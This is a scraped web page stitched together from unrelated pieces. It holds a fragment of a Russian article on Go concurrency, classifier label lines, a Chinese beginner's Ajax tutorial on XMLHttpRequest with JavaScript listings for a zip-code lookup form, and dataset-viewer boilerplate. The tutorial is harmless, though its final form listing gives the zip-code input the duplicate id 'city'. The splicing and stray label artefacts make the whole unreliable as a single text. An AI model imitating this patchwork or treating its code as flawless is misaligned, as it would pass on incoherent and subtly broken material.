• Параллелизм
• Гороутины
• Каналы
• Выбрать
• Пакет синхронизации
• Расширенные шаблоны параллелизма
• Контекст
• Приложение
• Следующие шаги
• Ссылки
Что такое Go?
Go (также известный как Golang) — это язык программирования, разработанный в Google в 2007 году и открытый в 2009 году.
Основное внимание в нем уделяется простоте, надежности и эффективности. Он был разработан, чтобы объединить эффективность, скорость и безопасность статически типизированного и компилируемого языка с легкостью…
Посмотреть на GitHub
Оцените статью
devanswers.ru
Добавить комментарий
|
__label__pos
| 0.540728 |
Ajax完整详细教程(一)
Ajax完整详细教程(一)
• 来源:未录入 2019-11-05 09:25:58 4
Ajax 简介
Ajax 由 HTML、JavaScript™ 技术、DHTML 和 DOM 组成,这一杰出的方法可以将笨拙的 Web 界面转化成交互性的 Ajax 应用程序。它是一种构建网站的强大方法。
Ajax 尝试建立桌面应用程序的功能和交互性,与不断更新的 Web 应用程序之间的桥梁。可以使用像桌面应用程序中常见的动态用户界面和漂亮的控件,不过是在 Web 应用程序中。
Ajax 应用程序所用到的基本技术:
1、HTML 用于建立 Web 表单并确定应用程序其他部分使用的字段。
2、JavaScript 代码是运行 Ajax应用程序的核心代码,帮助改进与服务器应用程序的通信。
3、DHTML 或 Dynamic HTML,用于动态更新表单。我们将使用div、span 和其他动态 HTML 元素来标记 HTML。
4、文档对象模型 DOM 用于(通过 JavaScript 代码)处理HTML 结构和(某些情况下)服务器返回的 XML。
Ajax 的定义
Ajax= Asynchronous JavaScript and XML(以及 DHTML 等)Asynchronous异步JS和XML。
XMLHttpRequest这是一个 JavaScript 对象; 是处理所有服务器通信的对象,创建该对象很简单,如清单 1 所示。
清单 1. 创建新的 XMLHttpRequest 对象
<script language="javascript" type="text/javascript">
var xmlHttp = new XMLHttpRequest();</script>
通过 XMLHttpRequest 对象与服务器进行对话的是 JavaScript 技术。这不是一般的应用程序流,这恰恰是 Ajax的强大功能的来源。
Ajax.png
Ajax 基本上就是把 JavaScript 技术和 XMLHttpRequest 对象放在 Web 表单和服务器之间。
Ajax1.png
得到 XMLHttpRequest 的句柄后,使用 JavaScript 代码完成以下任务:
1、获取表单数据:JavaScript 代码很容易从 HTML 表单中抽取数据并发送到服务器。
2、修改表单上的数据:更新表单也很简单,从设置字段值到迅速替换图像。
3、解析 HTML 和 XML:使用 JavaScript 代码操纵 DOM(请参阅 下一节),处理 HTML 表单服务器返回的 XML数据的结构
对于前两点,需要非常熟悉 getElementById() 方法,如 清单 2 所示。
清单 2. 用 JavaScript 代码捕获和设置字段值
//捕获字段值:
// 获得字段"phone"的值并用其创建一个变量phone
var phone = document.getElementById("phone").value;
//设置字段值:
// 从response的数组中获得值并将其写到标签中
document.getElementById("order").value = response[0];
document.getElementById("address").value = response[1];
DOM的功能
当需要在 JavaScript 代码和服务器之间传递 XML 和改变 HTML 表单的时候,我们再深入研究 DOM。
获取 Request 对象
XMLHttpRequest 是 Ajax 应用程序的核心.
var xmlhttp;
if (window.XMLHttpRequest)
{// 从 IE7+, Firefox, Chrome, Opera, Safari 中获得XMLHttpRequest对象
xmlhttp=new XMLHttpRequest();
}
else
{//从 IE6, IE5 中获得XMLHttpRequest对象
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
清单 4. 以支持多种浏览器的方式创建 XMLHttpRequest 对象
/* Create a new XMLHttpRequest object to talk to the Web server */
var xmlHttp = false;
/*@cc_on @*/
/*@if (@_jscript_version >= 5)
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e2) {
xmlHttp = false;
}
}
@end @*/
if (!xmlHttp && typeof XMLHttpRequest != 'undefined') {
xmlHttp = new XMLHttpRequest();
}
这段代码的核心分为三步:
1、建立一个变量 xmlHttp 来引用即将创建的 XMLHttpRequest 对象。
2、尝试在 Microsoft 浏览器中创建该对象:
1)尝试使用 Msxml2.XMLHTTP 对象创建它。
如果失败,再尝试 Microsoft.XMLHTTP 对象。
3、如果仍然没有建立 xmlHttp,则以非 Microsoft 的方式创建该对象。 最后,xmlHttp 应该引用一个有效的XMLHttpRequest 对象,无论运行什么样的浏览器。
Ajax 的请求/响应
与服务器上的 Web 应用程序打交道的是 JavaScript 技术,而不是直接提交给那个应用程序的 HTML 表单。
发出请求
如何使用XMLHttpRequest 对象?
首先–需要一个能够调用JavaScript 方法 的Web 页面 。
接下来就是在所有 Ajax 应用程序中基本都雷同的流程:
1、从 Web 表单中获取需要的数据。
2、建立要连接的 URL。
3、打开到服务器的连接。
4、设置服务器在完成后要运行的函数。
5、发送请求。
清单 5 中的示例 Ajax 方法就是按照这个顺序组织的:
清单 5. 发出 Ajax 请求
function callServer() {
// 获得city和state的值
var city = document.getElementById("city").value;
var state = document.getElementById("state").value;
// 当它们的值任一个不存在的时候结束JS
if ((city == null) || (city == "")) return;
if ((state == null) || (state == "")) return;
// 创建连接的URL对象
var url = "/scripts/getZipCode.php?city=" + escape(city) + "&state=" + escape(state);
// 打开一个连接服务器的连接
xmlHttp.open("GET", url, true);
// 设置一个方法,当请求返回的时候调用这个方法
xmlHttp.onreadystatechange = updatePage;
//xmlhttp.onreadystatechange=function()
//{
// if (xmlhttp.readyState==4 && xmlhttp.status==200)
// {
// document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
// }
//}
// 发生链接
xmlHttp.send(null);
}
开始的代码使用基本 JavaScript 代码获取几个表单字段的值。 然后设置一个 PHP 脚本作为链接的目标。 要注意脚本 URL 的指定方式,city 和 state(来自表单)使用简单的 GET 参数附加在 URL 之后。 最后一个参数如果设为 true,那么将请求一个异步连接(这就是 Ajax 的由来)。 如果使用 false,那么代码发出请求后将等待服务器返回的响应。 如果设为 true,当服务器在后台处理请求的时候用户仍然可以使用表单(甚至调用其他 JavaScript 方法)。
onreadystatechange属性可以告诉服务器在运行完成后做什么。因为代码没有等待服务器,必须让服务器知道怎么做以便您能作出响应。
在这个示例中,如果服务器处理完了请求,一个特殊的名为 updatePage() 的方法将被触发。
最后,使用值 null 调用send()。因为已经在请求 URL 中添加了要发送给服务器的数据(city 和state),所以请求中不需要发送任何数据。这样就发出了请求,服务器按照您的要求工作。
处理响应
1.什么也不要做,直到 xmlHttp.readyState 属性的值等于 4。
2.服务器将把响应填充到 xmlHttp.responseText 属性中。
其中的第一点,即就绪状态;
第二点,使用 xmlHttp.responseText 属性获得服务器的响应,清单 6中的示例方法可供服务器根据 清单 5 中发送的数据调用。
清单 6. 处理服务器响应
function updatePage() {
if (xmlHttp.readyState == 4) { var response = xmlHttp.responseText;
document.getElementById("zipCode").value = response;
}
}
它等待服务器调用,如果是就绪状态,则使用服务器返回的值(这里是用户输入的城市和州的 ZIP 编码)设置另一个表单字段的值。
一旦服务器返回 ZIP 编码,updatePage() 方法就用城市/州的 ZIP 编码设置那个字段的值,用户就可以改写该值。这样做有两个原因:
保持例子简单,说明有时候可能希望用户能够修改服务器返回的数据。
要记住这两点,它们对于好的用户界面设计来说很重要。
连接 Web 表单
一个 JavaScript 方法捕捉用户输入表单的信息并将其发送到服务器,另一个 JavaScript 方法监听和处理响应,并在响应返回时设置字段的值。所有这些实际上都依赖于调用 第一个 JavaScript 方法,它启动了整个过程。
利用 JavaScript 技术更新表单。
清单 7. 启动一个 Ajax 过程
<form>
<p>City: <input type="text" name="city" id="city" size="25"
onChange="callServer();" /></p>
<p>State: <input type="text" name="state" id="state" size="25"
onChange="callServer();" /></p>
<p>Zip Code: <input type="text" name="zipCode" id="city" size="5" /></p>
</form>
结束语
在下一期文章中,您将掌握:
1、XMLHttpRequest 对象
2、学会如何处理 JavaScript 和服务器的通信
3、如何使用 HTML 表单以及如何获得 DOM 句柄。
更多相关问题请访问PHP中文网:Ajax视频教程
本文系列文章:
Ajax完整详细教程(二)
Ajax完整详细教程(三)
以上就是Ajax完整详细教程(一)的详细内容,更多请关注Gxl网其它相关文章!
|
__label__pos
| 0.651597 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.